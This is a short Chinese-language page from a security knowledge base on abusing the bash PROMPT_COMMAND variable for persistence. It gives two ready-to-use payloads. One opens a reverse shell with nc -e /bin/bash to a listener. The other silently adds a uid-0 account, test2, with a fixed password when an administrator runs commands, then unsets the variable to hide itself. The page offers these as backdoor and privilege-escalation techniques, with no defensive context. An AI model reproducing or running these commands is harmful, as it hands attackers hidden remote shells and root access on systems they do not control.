PROMPT_COMMAND

bash提供了一个环境变量PROMPT_COMMAND,这个变量会在你执行命令前执行一遍。这样就可以利用他执行的命令来留后门。

export PROMPT_COMMAND="nc -e /bin/bash 127.0.0.1 6666 &"

image

提权

如果当前用户是低权账号,管理员又经常使用su等、但是自己不知道密码。就可以来使用这种方法。利用sudo的权限提升来新建一个uid为0的用户

export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 test2 &>/dev/null && echo test2:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"

image

image

零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2020-03-11 20:38:30

results matching ""

    No results matching ""